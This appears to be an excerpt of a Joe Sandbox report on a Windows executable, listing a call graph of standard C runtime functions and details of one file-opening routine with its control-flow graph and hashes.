18118->17955 18120 7ff7127618be Concurrency::cancel_current_task 18119->18120 18121 7ff7127755d0 Concurrency::cancel_current_task 2 API calls 18120->18121 18122 7ff7127618cf 18121->18122 18123 7ff71277538c __std_exception_copy 35 API calls 18122->18123 18124 7ff7127618f9 18123->18124 18135 7ff71277b5c8 18125->18135 18127 7ff712772c75 _Yarn 18128 7ff712772c9e 18127->18128 18129 7ff71277b5c8 std::_Locinfo::_Locinfo_ctor 68 API calls 18127->18129 18129->18128 18148 7ff712761230 18130->18148 18133 7ff7127755d0 Concurrency::cancel_current_task 2 API calls 18134 7ff712772946 18133->18134 18136 7ff712781f6c std::_Locinfo::_Locinfo_ctor 38 API calls 18135->18136 18137 7ff71277b5de 18136->18137 18140 7ff71277b2e8 18137->18140 18147 7ff71277b23c EnterCriticalSection 18140->18147 18142 7ff71277b304 18143 7ff71277b328 std::_Locinfo::_Locinfo_ctor 68 API calls 18142->18143 18144 7ff71277b30d 18143->18144 18145 7ff71277b290 BuildCatchObjectHelperInternal LeaveCriticalSection 18144->18145 18146 7ff71277b317 18145->18146 18146->18127 18149 7ff71277538c __std_exception_copy 35 API calls 18148->18149 18150 7ff712761273 18149->18150 18151 7ff7127736e0 std::_Xinvalid_argument 8 API calls 18150->18151 18152 7ff71276128d 18151->18152 18152->18133 18154 7ff71277b614 18153->18154 18155 7ff71277b63a 18154->18155 18158 7ff71277b66d 18154->18158 18156 7ff71277b1d0 _set_fmode 13 API calls 18155->18156 18157 7ff71277b63f 18156->18157 18159 7ff71277aff8 _invalid_parameter_noinfo 35 API calls 18157->18159 18160 7ff71277b673 18158->18160 18161 7ff71277b680 18158->18161 18165 7ff712772f29 18159->18165 18162 7ff71277b1d0 _set_fmode 13 API calls 18160->18162 18180 7ff71278156c 18161->18180 18162->18165 18165->17969 18172 7ff71277abd8 18165->18172 18166 7ff71277b694 18168 7ff71277b1d0 _set_fmode 13 API calls 18166->18168 18167 7ff71277b6a1 18187 7ff7127844b0 18167->18187 18168->18165 18170 7ff71277b6b4 18192 7ff712779cb4 LeaveCriticalSection 18170->18192 18173 7ff71277ac08 18172->18173 18401 7ff71277a8bc 18173->18401 18175 7ff71277ac24 18175->17971 18177 7ff712779910 18176->18177 18413 7ff7127797bc 18177->18413 18179 7ff712779929 18179->17969 18193 7ff71277b23c EnterCriticalSection 18180->18193 18182 7ff712781583 18183 7ff7127815e0 15 API calls 18182->18183 18184 7ff71278158e 18183->18184 18185 7ff71277b290 BuildCatchObjectHelperInternal LeaveCriticalSection 18184->18185 18186 7ff71277b68a 18185->18186 18186->18166 18186->18167 18194 7ff7127841ac 18187->18194 18190 7ff712784508 18190->18170 18195 7ff7127841e7 __vcrt_InitializeCriticalSectionEx 18194->18195 18204 7ff7127843ae 18195->18204 18209 7ff71278a434 18195->18209 18196 7ff71277b1d0 _set_fmode 13 API calls 18197 7ff712784485 18196->18197 18198 7ff71277aff8 _invalid_parameter_noinfo 35 API calls 18197->18198 18199 7ff7127843b7 18198->18199 18199->18190 18206 7ff71278b000 18199->18206 18201 7ff712784419 18202 7ff71278a434 39 API calls 18201->18202 18201->18204 18203 7ff712784438 18202->18203 18203->18204 18205 7ff71278a434 39 API calls 18203->18205 18204->18196 18204->18199 18205->18204 18242 7ff71278a5d0 18206->18242 18210 7ff71278a441 18209->18210 18211 7ff71278a465 18209->18211 18210->18211 18212 7ff71278a446 18210->18212 18213 7ff71278a4a7 18211->18213 18216 7ff71278a4c6 18211->18216 18214 7ff71277b1d0 _set_fmode 13 API calls 18212->18214 18215 7ff71277b1d0 _set_fmode 13 API calls 18213->18215 18217 7ff71278a44b 18214->18217 18218 7ff71278a4ac 18215->18218 18219 7ff71278a4b7 __crtLCMapStringW 18216->18219 18226 7ff71277bfe8 18216->18226 18220 7ff71277aff8 _invalid_parameter_noinfo 35 API calls 18217->18220 18221 7ff71277aff8 _invalid_parameter_noinfo 35 API calls 18218->18221 18219->18201 18223 7ff71278a456 18220->18223 18221->18219 18223->18201 18224 7ff71278a4df 18224->18219 18225 7ff71278b1ec 39 API calls TranslateName 18224->18225 18225->18224 18227 7ff71277c00c 18226->18227 18233 7ff71277c007 18226->18233 18228 7ff71277ff80 _Getctype 36 API calls 18227->18228 18227->18233 18229 7ff71277c027 18228->18229 18234 7ff712782280 18229->18234 18233->18224 18235 7ff71277c04a 18234->18235 18236 7ff712782295 18234->18236 18238 7ff7127822ec 18235->18238 18236->18235 18237 7ff712788914 _Getctype 36 API calls 18236->18237 18237->18235 18239 7ff712782314 18238->18239 18240 7ff712782301 18238->18240 18239->18233 18240->18239 18241 7ff712786c5c TranslateName 36 API calls 18240->18241 18241->18239 18243 7ff71278a605 18242->18243 18244 7ff71278a5e7 18242->18244 18243->18244 18247 7ff71278a621 18243->18247 18245 7ff71277b1d0 _set_fmode 13 API calls 18244->18245 18246 7ff71278a5ec 18245->18246 18248 7ff71277aff8 _invalid_parameter_noinfo 35 API calls 18246->18248 18253 7ff71278abec 18247->18253 18251 7ff71278a5f8 18248->18251 18251->18190 18298 7ff71278a914 18253->18298 18256 7ff71278ac5f 18329 7ff71277b1ac 18256->18329 18257 7ff71278ac77 18317 7ff712787318 18257->18317 18261 7ff71278ac83 18266 7ff71277b1ac _fread_nolock 13 API calls 18261->18266 18262 7ff71278ac9c CreateFileW 18263 7ff71278ada2 18262->18263 18264 7ff71278ad1a 18262->18264 18268 7ff71278ada5 GetFileType 18263->18268 18267 7ff71278ad6f GetLastError 18264->18267 18270 7ff71278ad35 CreateFileW 18264->18270 18265 7ff71277b1d0 _set_fmode 13 API calls 18289 7ff71278a64c 18265->18289 18269 7ff71278ac88 18266->18269 18332 7ff71277b160 18267->18332 18272 7ff71278adb2 GetLastError 18268->18272 18273 7ff71278ae03 18268->18273 18274 7ff71277b1d0 _set_fmode 13 API calls 18269->18274 18270->18267 18270->18268 18276 7ff71277b160 _fread_nolock 13 API calls 18272->18276 18337 7ff712787230 18273->18337 18275 7ff71278ac64 18274->18275 18275->18265 18277 7ff71278adc1 CloseHandle 18276->18277 18277->18275 18279 7ff71278adf3 18277->18279 18281 7ff71277b1d0 _set_fmode 13 API calls 18279->18281 18283 7ff71278adf8 18281->18283 18282 7ff71278ae79 18287 7ff71278ae80 18282->18287 18365 7ff71278a694 18282->18365 18283->18275 18361 7ff712781404 18287->18361 18288 7ff71278aec8 18288->18289 18291 7ff71278af48 CloseHandle CreateFileW 18288->18291 18289->18251 18297 7ff7127872f0 LeaveCriticalSection 18289->18297 18292 7ff71278af8f GetLastError 18291->18292 18293 7ff71278afbd 18291->18293 18294 7ff71277b160 _fread_nolock 13 API calls 18292->18294 18293->18289 18295 7ff71278af9c 18294->18295 18392 7ff712787458 18295->18392 18299 7ff71278a94e 18298->18299 18307 7ff71278a968 18298->18307 18300 7ff71277b1d0 _set_fmode 13 API calls 18299->18300 18299->18307 18301 7ff71278a95d 18300->18301 18302 7ff71277aff8 _invalid_parameter_noinfo 35 API calls 18301->18302 18302->18307 18303 7ff71278aa31 18305 7ff71277cfb0 35 API calls 18303->18305 18315 7ff71278aa93 18303->18315 18304 7ff71278a9e0 18304->18303 18306 7ff71277b1d0 _set_fmode 13 API calls 18304->18306 18308 7ff71278aa8f 18305->18308 18309 7ff71278aa26 18306->18309 18307->18304 18310 7ff71277b1d0 _set_fmode 13 API calls 18307->18310 18313 7ff71277b048 _invalid_parameter_noinfo_noreturn 17 API calls 18308->18313 18308->18315 18311 7ff71277aff8 _invalid_parameter_noinfo 35 API calls 18309->18311 18312 7ff71278a9d5 18310->18312 18311->18303 18314 7ff71277aff8 _invalid_parameter_noinfo 35 API calls 18312->18314 18316 7ff71278ab26 18313->18316 18314->18304 18315->18256 18315->18257 18318 7ff71277b23c BuildCatchObjectHelperInternal EnterCriticalSection 18317->18318 18326 7ff71278733b 18318->18326 18319 7ff712787387 18321 7ff71277b290 BuildCatchObjectHelperInternal LeaveCriticalSection 18319->18321 18320 7ff712787364 18322 7ff712787068 14 API calls 18320->18322 18323 7ff712787439 18321->18323 18324 7ff712787369 18322->18324 18323->18261 18323->18262 18324->18319 18327 7ff712787208 _fread_nolock EnterCriticalSection 18324->18327 18325 7ff7127873ba EnterCriticalSection 18325->18319 18328 7ff7127873c9 LeaveCriticalSection 18325->18328 18326->18319 18326->18320 18326->18325 18327->18319 18328->18326 18330 7ff71277ffe0 _set_fmode 13 API calls 18329->18330 18331 7ff71277b1b5 18330->18331 18331->18275 18333 7ff71277b1ac _fread_nolock 13 API calls 18332->18333 18334 7ff71277b16d __free_lconv_num 18333->18334 18335 7ff71277b1d0 _set_fmode 13 API calls 18334->18335 18336 7ff71277b17d 18335->18336 18336->18275 18338 7ff7127872be 18337->18338 18339 7ff712787253 18337->18339 18340 7ff71277b1d0 _set_fmode 13 API calls 18338->18340 18339->18338 18345 7ff71278727f 18339->18345 18341 7ff7127872c3 18340->18341 18342 7ff71277b1ac _fread_nolock 13 API calls 18341->18342 18343 7ff7127872b1 18342->18343 18343->18282 18346 7ff71278ab28 18343->18346 18344 7ff7127872a8 SetStdHandle 18344->18343 18345->18343 18345->18344 18347 7ff71278ab5f 18346->18347 18360 7ff71278ab8f 18346->18360 18348 7ff7127837d4 _fread_nolock 37 API calls 18347->18348 18347->18360 18349 7ff71278ab74 18348->18349 18350 7ff71278ab93 18349->18350 18351 7ff71278ab7d 18349->18351 18352 7ff712783100 _fread_nolock 47 API calls 18350->18352 18353 7ff71277b1ac _fread_nolock 13 API calls 18351->18353 18355 7ff71278abaa 18352->18355 18356 7ff71278ab82 18353->18356 18354 7ff71278abc0 18354->18356 18357 7ff7127837d4 _fread_nolock 37 API calls 18354->18357 18355->18354 18359 7ff71278b9b8 62 API calls 18355->18359 18358 7ff71277b1d0 _set_fmode 13 API calls 18356->18358 18356->18360 18357->18356 18358->18360 18359->18354 18360->18282 18362 7ff712781434 18361->18362 18363 7ff71278149c 38 API calls 18362->18363 18364 7ff71278144d 18363->18364 18364->18289 18366 7ff71278a6e5 18365->18366 18384 7ff71278a80d 18365->18384 18367 7ff71277cfb0 35 API calls 18366->18367 18372 7ff71278a704 18366->18372 18368 7ff71278a6fc 18367->18368 18369 7ff71278a8ff 18368->18369 18368->18372 18370 7ff71277b048 _invalid_parameter_noinfo_noreturn 17 API calls 18369->18370 18371 7ff71278a913 18370->18371 18374 7ff7127837d4 _fread_nolock 37 API calls 18372->18374 18380 7ff71278a7b6 18372->18380 18372->18384 18389 7ff71278a802 18372->18389 18373 7ff712783100 _fread_nolock 47 API calls 18378 7ff71278a834 18373->18378 18376 7ff71278a7f0 18374->18376 18375 7ff712780d84 60 API calls 18375->18380 18376->18380 18383 7ff71278a7f5 18376->18383 18377 7ff71277b1d0 _set_fmode 13 API calls 18377->18384 18379 7ff71278a896 18378->18379 18381 7ff71278a870 18378->18381 18382 7ff71278a863 18378->18382 18378->18384 18391 7ff71278a808 18378->18391 18388 7ff7127837d4 _fread_nolock 37 API calls 18379->18388 18380->18375 18380->18384 18380->18391 18381->18379 18387 7ff71278a879 18381->18387 18385 7ff71277b1d0 _set_fmode 13 API calls 18382->18385 18386 7ff7127837d4 _fread_nolock 37 API calls 18383->18386 18384->18287 18384->18288 18385->18391 18386->18389 18390 7ff7127837d4 _fread_nolock 37 API calls 18387->18390 18388->18391 18389->18373 18389->18384 18389->18391 18390->18391 18391->18377 18391->18384 18393 7ff7127874e6 18392->18393 18394 7ff712787474 18392->18394 18395 7ff71277b1d0 _set_fmode 13 API calls 18393->18395 18394->18393 18400 7ff7127874a7 18394->18400 18396 7ff7127874eb 18395->18396 18397 7ff71277b1ac _fread_nolock 13 API calls 18396->18397 18398 7ff7127874d8 18397->18398 18398->18293 18399 7ff7127874d0 SetStdHandle 18399->18398 18400->18398 18400->18399 18402 7ff71277a926 18401->18402 18403 7ff71277a8e6 18401->18403 18402->18403 18405 7ff71277a932 18402->18405 18404 7ff71277af40 _invalid_parameter_noinfo_noreturn 35 API calls 18403->18404 18411 7ff71277a90d 18404->18411 18412 7ff712779ca8 EnterCriticalSection 18405->18412 18411->18175 18414 7ff7127797d7 18413->18414 18415 7ff712779805 18413->18415 18416 7ff71277af40 _invalid_parameter_noinfo_noreturn 35 API calls 18414->18416 18422 7ff7127797f7 18415->18422 18423 7ff712779ca8 EnterCriticalSection 18415->18423 18416->18422 18418 7ff71277981c 18419 7ff712779838 63 API calls 18418->18419 18420 7ff712779828 18419->18420 18421 7ff712779cb4 _fread_nolock LeaveCriticalSection 18420->18421 18421->18422 18422->18179 18425 7ff712779c69 18424->18425 18429 7ff712779c79 18424->18429 18426 7ff71277b1d0 _set_fmode 13 API calls 18425->18426 18427 7ff712779c6e 18426->18427 18428 7ff71277aff8 _invalid_parameter_noinfo 35 API calls 18427->18428 18428->18429 18429->17975 18431 7ff712764b43 _Yarn 18430->18431 18432 7ff712764ac8 _Yarn 18430->18432 18431->18432 18461 7ff71277a064 18431->18461 18432->17901 18435 7ff71276642e 18434->18435 18444 7ff7127664b0 18434->18444 18480 7ff712765af0 18435->18480 18437 7ff7127736e0 std::_Xinvalid_argument 8 API calls 18439 7ff7127664de 18437->18439 18439->17903 18440 7ff71276649d 18441 7ff712772948 __uncaught_exceptions 9 API calls 18440->18441 18442 7ff7127664a2 18441->18442 18443 7ff712766550 37 API calls 18442->18443 18442->18444 18443->18444 18444->18437 18445 7ff7127664f3 18446 7ff712761e70 37 API calls 18445->18446 18447 7ff712766535 18446->18447 18448 7ff7127755d0 Concurrency::cancel_current_task 2 API calls 18447->18448 18449 7ff712766546 18448->18449 18450->17906 18451 7ff712775678 18450->18451 18484 7ff712775a20 18451->18484 18455 7ff712766599 18454->18455 18456 7ff712766567 18454->18456 18455->17907 18456->18455 18457 7ff712761e70 37 API calls 18456->18457 18458 7ff7127665df 18457->18458 18459 7ff7127755d0 Concurrency::cancel_current_task 2 API calls 18458->18459 18460 7ff7127665f0 18459->18460 18462 7ff71277a094 18461->18462 18465 7ff712779db4 18462->18465 18464 7ff71277a0b2 18464->18432 18466 7ff712779dd4 18465->18466 18467 7ff712779e01 18465->18467 18466->18467 18468 7ff712779dde 18466->18468 18469 7ff712779e09 18466->18469 18467->18464 18470 7ff71277af40 _invalid_parameter_noinfo_noreturn 35 API calls 18468->18470 18472 7ff712779cf4 18469->18472 18470->18467 18479 7ff712779ca8 EnterCriticalSection 18472->18479 18474 7ff712779d11 18475 7ff712779d34 65 API calls 18474->18475 18476 7ff712779d1a 18475->18476 18477 7ff712779cb4 _fread_nolock LeaveCriticalSection 18476->18477 18478 7ff712779d25 18477->18478 18478->18467 18482 7ff712765b19 18480->18482 18481 7ff712765b2e 18481->18440 18481->18445 18482->18481 18483 7ff7127663f0 46 API calls 18482->18483 18483->18481 18485 7ff712775a37 GetLastError 18484->18485 18486 7ff712775681 18484->18486 18489 7ff712778f1c 18485->18489 18486->17906 18490 7ff712778d3c __vcrt_InitializeCriticalSectionEx 5 API calls 18489->18490 18491 7ff712778f43 TlsGetValue 18490->18491 18494 7ff712765c73 18493->18494 18495 7ff712765d22 18493->18495 18494->18495 18501 7ff712765c7d 18494->18501 18496 7ff7127736e0 std::_Xinvalid_argument 8 API calls 18495->18496 18497 7ff712765d31 18496->18497 18497->17918 18498 7ff712765cc1 18499 7ff7127736e0 std::_Xinvalid_argument 8 API calls 18498->18499 18500 7ff712765cde 18499->18500 18500->17918 18501->18498 18502 7ff71277a064 67 API calls 18501->18502 18502->18498 18504 7ff7127685e4 18503->18504 18507 7ff712768516 18503->18507 18505 7ff712761210 37 API calls 18504->18505 18506 7ff7127685ea 18505->18506 18509 7ff71276851c _Yarn 18507->18509 18510 7ff71276854c 18507->18510 18511 7ff7127685a5 18507->18511 18508 7ff712773708 std::_Facet_Register 37 API calls 18512 7ff712768562 18508->18512 18509->17928 18510->18508 18513 7ff7127685de 18510->18513 18514 7ff712773708 std::_Facet_Register 37 API calls 18511->18514 18512->18509 18516 7ff71277b018 _invalid_parameter_noinfo_noreturn 35 API calls 18512->18516 18515 7ff712761170 Concurrency::cancel_current_task 37 API calls 18513->18515 18514->18509 18515->18504 18516->18513 18520 7ff71276151a 18517->18520 18518 7ff712761536 _Yarn 18528 7ff71277538c __std_exception_copy 35 API calls 18518->18528 18529 7ff7127616a3 18518->18529 18519 7ff712761210 37 API calls 18523 7ff7127616b4 __std_exception_destroy ctype 18519->18523 18520->18518 18521 7ff71276155e 18520->18521 18524 7ff7127615be 18520->18524 18531 7ff7127616ae 18520->18531 18522 7ff712773708 std::_Facet_Register 37 API calls 18521->18522 18525 7ff7127616a8 18521->18525 18522->18518 18523->17930 18526 7ff712773708 std::_Facet_Register 37 API calls 18524->18526 18527 7ff712761170 Concurrency::cancel_current_task 37 API calls 18525->18527 18526->18518 18527->18531 18532 7ff712761630 18528->18532 18530 7ff71277b018 _invalid_parameter_noinfo_noreturn 35 API calls 18529->18530 18530->18525 18531->18519 18532->18529 18533 7ff71276166e ctype 18532->18533 18534 7ff7127736e0 std::_Xinvalid_argument 8 API calls 18533->18534 18535 7ff712761695 18534->18535 18535->17930 18537 7ff7127683ae 18536->18537 18541 7ff712768279 18536->18541 18538 7ff712761210 37 API calls 18537->18538 18539 7ff7127683b4 18538->18539 18540 7ff7127683a8 18545 7ff712761170 Concurrency::cancel_current_task 37 API calls 18540->18545 18541->18540 18542 7ff71276831e 18541->18542 18543 7ff7127682f2 18541->18543 18547 7ff7127682d7 _Yarn 18541->18547 18544 7ff712773708 std::_Facet_Register 37 API calls 18542->18544 18543->18540 18546 7ff712773708 std::_Facet_Register 37 API calls 18543->18546 18544->18547 18545->18537 18546->18547 18548 7ff71277b018 _invalid_parameter_noinfo_noreturn 35 API calls 18547->18548 18549 7ff712768370 _Yarn ctype 18547->18549 18548->18540 18549->17733 18551 7ff712774296 RtlLookupFunctionEntry 18550->18551 18552 7ff7127742ac RtlVirtualUnwind 18551->18552 18553 7ff7127740af 18551->18553 18552->18551 18552->18553 18554 7ff712774050 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18553->18554 18556 7ff71276893c 18555->18556 18557 7ff7127681ee 18555->18557 18556->18557 18558 7ff712773708 std::_Facet_Register 37 API calls 18556->18558 18557->17775 18557->17776 18559 7ff71276894f 18558->18559 18560 7ff7127726ac std::_Lockit::_Lockit 39 API calls 18559->18560 18561 7ff712768980 18560->18561 18562 7ff7127689bc 18561->18562 18563 7ff712768a76 18561->18563 18564 7ff712772c5c std::_Locinfo::_Locinfo_ctor 68 API calls 18562->18564 18565 7ff712772924 37 API calls 18563->18565 18566 7ff7127689c8 18564->18566 18567 7ff712768a82 18565->18567 18571 7ff712772cc8 18566->18571 18569 7ff7127689e3 18570 7ff712772724 std::_Lockit::~_Lockit LeaveCriticalSection 18569->18570 18570->18557 18572 7ff712772cdc 18571->18572 18573 7ff712772cd5 18571->18573 18572->18569 18574 7ff71277b5c8 std::_Locinfo::_Locinfo_ctor 68 API calls 18573->18574 18574->18572 18576 7ff71277ff80 _Getctype 36 API calls 18575->18576 18577 7ff71277efe9 18576->18577 18578 7ff71277c108 BuildCatchObjectHelperInternal 36 API calls 18577->18578 18579 7ff71277effe 18578->18579 20718 7ff71277d474 20721 7ff71277d240 20718->20721 20728 7ff71277b23c EnterCriticalSection 20721->20728 18687 7ff71278b688 18690 7ff712786bfc 18687->18690 18691 7ff712786c09 18690->18691 18695 7ff712786c4e 18690->18695 18696 7ff71277ff9c 18691->18696 18697 7ff71277ffb8 FlsGetValue 18696->18697 18698 7ff71277ffb4 18696->18698 18697->18698 18700 7ff71277ffd3 18698->18700 18701 7ff71277fe60 _set_fmode 13 API calls 18698->18701 18703 7ff71277ffce 18698->18703 18699 7ff71277c108 BuildCatchObjectHelperInternal 36 API calls 18702 7ff71277ffdd 18699->18702 18704 7ff7127868d4 18700->18704 18701->18703 18703->18699 18703->18700 18727 7ff712786b44 18704->18727 18711 7ff71278693f 18712 7ff712781270 __free_lconv_num 13 API calls 18711->18712 18723 7ff712786926 18712->18723 18713 7ff71278694e 18713->18713 18752 7ff712786c78 18713->18752 18716 7ff712786a4a 18718 7ff71277b1d0 _set_fmode 13 API calls 18716->18718 18717 7ff712786a64 18721 7ff712786aa5 18717->18721 18724 7ff712781270 __free_lconv_num 13 API calls 18717->18724 18719 7ff712786a4f 18718->18719 18720 7ff712781270 __free_lconv_num 13 API calls 18719->18720 18720->18723 18722 7ff712786b0c 18721->18722 18763 7ff7127863f4 18721->18763 18726 7ff712781270 __free_lconv_num 13 API calls 18722->18726 18723->18695 18724->18721 18726->18723 18728 7ff712786b67 18727->18728 18729 7ff712786b71 18728->18729 18778 7ff71277b23c EnterCriticalSection 18728->18778 18731 7ff712786909 18729->18731 18733 7ff71277c108 BuildCatchObjectHelperInternal 36 API calls 18729->18733 18738 7ff7127865c4 18731->18738 18735 7ff712786bfb 18733->18735 18739 7ff71277bfe8 TranslateName 36 API calls 18738->18739 18740 7ff7127865d8 18739->18740 18741 7ff7127865f6 18740->18741 18742 7ff7127865e4 GetOEMCP 18740->18742 18743 7ff71278660b 18741->18743 18744 7ff7127865fb GetACP 18741->18744 18742->18743 18743->18723 18745 7ff712783880 18743->18745 18744->18743 18746 7ff7127838cb 18745->18746 18750 7ff71278388f _fread_nolock 18745->18750 18747 7ff71277b1d0 _set_fmode 13 API calls 18746->18747 18749 7ff7127838c9 18747->18749 18748 7ff7127838b2 HeapAlloc 18748->18749 18748->18750 18749->18711 18749->18713 18750->18746 18750->18748 18751 7ff71277c370 std::_Facet_Register 2 API calls 18750->18751 18751->18750 18753 7ff7127865c4 38 API calls 18752->18753 18754 7ff712786cb3 18753->18754 18755 7ff712786e09 18754->18755 18756 7ff712786cf0 IsValidCodePage 18754->18756 18762 7ff712786d0a __scrt_get_show_window_mode 18754->18762 18757 7ff7127736e0 std::_Xinvalid_argument 8 API calls 18755->18757 18756->18755 18758 7ff712786d01 18756->18758 18759 7ff712786a41 18757->18759 18760 7ff712786d30 GetCPInfo 18758->18760 18758->18762 18759->18716 18759->18717 18760->18755 18760->18762 18779 7ff7127866dc 18762->18779 18860 7ff71277b23c EnterCriticalSection 18763->18860 18780 7ff712786727 GetCPInfo 18779->18780 18789 7ff71278681d 18779->18789 18785 7ff71278673a 18780->18785 18780->18789 18781 7ff7127736e0 std::_Xinvalid_argument 8 API calls 18782 7ff7127868bc 18781->18782 18782->18755 18790 7ff712784998 18785->18790 18788 7ff712784e5c 42 API calls 18788->18789 18789->18781 18791 7ff71277bfe8 TranslateName 36 API calls 18790->18791 18792 7ff7127849da 18791->18792 18810 7ff712785950 18792->18810 18794 7ff712784a17 18797 7ff7127736e0 std::_Xinvalid_argument 8 API calls 18794->18797 18795 7ff712784a10 18795->18794 18796 7ff712783880 _fread_nolock 14 API calls 18795->18796 18798 7ff712784ad4 18795->18798 18801 7ff712784a40 std::_Locinfo::_Locinfo_ctor __scrt_get_show_window_mode 18795->18801 18796->18801 18799 7ff712784b0d 18797->18799 18798->18794 18800 7ff712781270 __free_lconv_num 13 API calls 18798->18800 18805 7ff712784e5c 18799->18805 18800->18794 18801->18798 18802 7ff712785950 _fread_nolock MultiByteToWideChar 18801->18802 18803 7ff712784ab6 18802->18803 18803->18798 18804 7ff712784aba GetStringTypeW 18803->18804 18804->18798 18806 7ff71277bfe8 TranslateName 36 API calls 18805->18806 18807 7ff712784e81 18806->18807 18813 7ff712784b28 18807->18813 18812 7ff712785959 MultiByteToWideChar 18810->18812 18814 7ff712784b69 18813->18814 18815 7ff712785950 _fread_nolock MultiByteToWideChar 18814->18815 18818 7ff712784bb3 18815->18818 18816 7ff712784e31 18817 7ff7127736e0 std::_Xinvalid_argument 8 API calls 18816->18817 18819 7ff712784e3f 18817->18819 18818->18816 18820 7ff712783880 _fread_nolock 14 API calls 18818->18820 18821 7ff712784ce9 18818->18821 18823 7ff712784beb std::_Locinfo::_Locinfo_ctor 18818->18823 18819->18788 18820->18823 18821->18816 18822 7ff712781270 __free_lconv_num 13 API calls 18821->18822 18822->18816 18823->18821 18824 7ff712785950 _fread_nolock MultiByteToWideChar 18823->18824 18825 7ff712784c5e 18824->18825 18825->18821 18844 7ff712781e00 18825->18844 18828 7ff712784cfa 18830 7ff712783880 _fread_nolock 14 API calls 18828->18830 18832 7ff712784dcc 18828->18832 18834 7ff712784d18 std::_Locinfo::_Locinfo_ctor 18828->18834 18829 7ff712784ca9 18829->18821 18831 7ff712781e00 __crtLCMapStringW 39 API calls 18829->18831 18830->18834 18831->18821 18832->18821 18833 7ff712781270 __free_lconv_num 13 API calls 18832->18833 18833->18821 18834->18821 18835 7ff712781e00 __crtLCMapStringW 39 API calls 18834->18835 18836 7ff712784d98 18835->18836 18836->18832 18837 7ff712784dce 18836->18837 18838 7ff712784db8 18836->18838 18839 7ff7127859e0 std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 18837->18839 18853 7ff7127859e0 18838->18853 18841 7ff712784dc6 18839->18841 18841->18832 18842 7ff712784de6 18841->18842 18842->18821 18843 7ff712781270 __free_lconv_num 13 API calls 18842->18843 18843->18821 18845 7ff712781e2c 18844->18845 18846 7ff712781eab 18844->18846 18848 7ff712781924 __crtLCMapStringW 37 API calls 18845->18848 18849 7ff712781e4f 18845->18849 18856 7ff712781ef4 18846->18856 18848->18849 18849->18846 18852 7ff712781ea9 LCMapStringEx 18849->18852 18850 7ff712781eb5 LCMapStringW 18851 7ff712781edd 18850->18851 18851->18821 18851->18828 18851->18829 18852->18846 18855 7ff712785a04 WideCharToMultiByte 18853->18855 18857 7ff712781f32 __crtLCMapStringW 18856->18857 18858 7ff712781f10 18856->18858 18857->18850 18858->18857 18859 7ff712781924 __crtLCMapStringW 37 API calls 18858->18859 18859->18857

                                                                                                                                Executed Functions

                                                                                                                                Function 00007FF71278ABEC Relevance: 13.8, APIs: 9, Instructions: 282fileCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 77 7ff71278abec-7ff71278ac5d call 7ff71278a914 80 7ff71278ac5f-7ff71278ac68 call 7ff71277b1ac 77->80 81 7ff71278ac77-7ff71278ac81 call 7ff712787318 77->81 86 7ff71278ac6b-7ff71278ac72 call 7ff71277b1d0 80->86 87 7ff71278ac83-7ff71278ac9a call 7ff71277b1ac call 7ff71277b1d0 81->87 88 7ff71278ac9c-7ff71278ad14 CreateFileW 81->88 100 7ff71278afde-7ff71278affe 86->100 87->86 89 7ff71278ada2 88->89 90 7ff71278ad1a-7ff71278ad2d 88->90 96 7ff71278ada5-7ff71278adb0 GetFileType 89->96 93 7ff71278ad6f-7ff71278ad9d GetLastError call 7ff71277b160 90->93 94 7ff71278ad2f-7ff71278ad33 90->94 93->86 94->93 98 7ff71278ad35-7ff71278ad6d CreateFileW 94->98 101 7ff71278adb2-7ff71278aded GetLastError call 7ff71277b160 CloseHandle 96->101 102 7ff71278ae03-7ff71278ae0a 96->102 98->93 98->96 101->86 113 7ff71278adf3-7ff71278adfe call 7ff71277b1d0 101->113 105 7ff71278ae12-7ff71278ae15 102->105 106 7ff71278ae0c-7ff71278ae10 102->106 109 7ff71278ae1b-7ff71278ae70 call 7ff712787230 105->109 110 7ff71278ae17 105->110 106->109 116 7ff71278ae8f-7ff71278aec2 call 7ff71278a694 109->116 117 7ff71278ae72-7ff71278ae7e call 7ff71278ab28 109->117 110->109 113->86 123 7ff71278aec4-7ff71278aec6 116->123 124 7ff71278aec8-7ff71278af0b 116->124 117->116 125 7ff71278ae80 117->125 126 7ff71278ae82-7ff71278ae8a call 7ff712781404 123->126 127 7ff71278af2d-7ff71278af38 124->127 128 7ff71278af0d-7ff71278af11 124->128 125->126 126->100 130 7ff71278afdc 127->130 131 7ff71278af3e-7ff71278af42 127->131 128->127 129 7ff71278af13-7ff71278af28 128->129 129->127 130->100 131->130 133 7ff71278af48-7ff71278af8d CloseHandle CreateFileW 131->133 135 7ff71278af8f-7ff71278afbd GetLastError call 7ff71277b160 call 7ff712787458 133->135 136 7ff71278afc2-7ff71278afd7 133->136 135->136 136->130
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2049208008.00007FF712761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF712760000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2049116829.00007FF712760000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049374532.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049591485.00007FF7128FB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2049611269.00007FF7128FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_7ff712760000_dYUteuvmHn.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1617910340-0
                                                                                                                                • Opcode ID: 457a38b2b65a12c21426f51fa5410eaec7f270bc95e61a3b30d8afd352964072
                                                                                                                                • Instruction ID: ff95ae95ea5e81da869d99eaf819c2902f585784619d47e96db16b06d7bfa9de
                                                                                                                                • Opcode Fuzzy Hash: 457a38b2b65a12c21426f51fa5410eaec7f270bc95e61a3b30d8afd352964072
                                                                                                                                • Instruction Fuzzy Hash: 79C1D033B24E4186EB10EF68C4822BE7761FB4ABA8F405225DB1E97394DF78E059C350
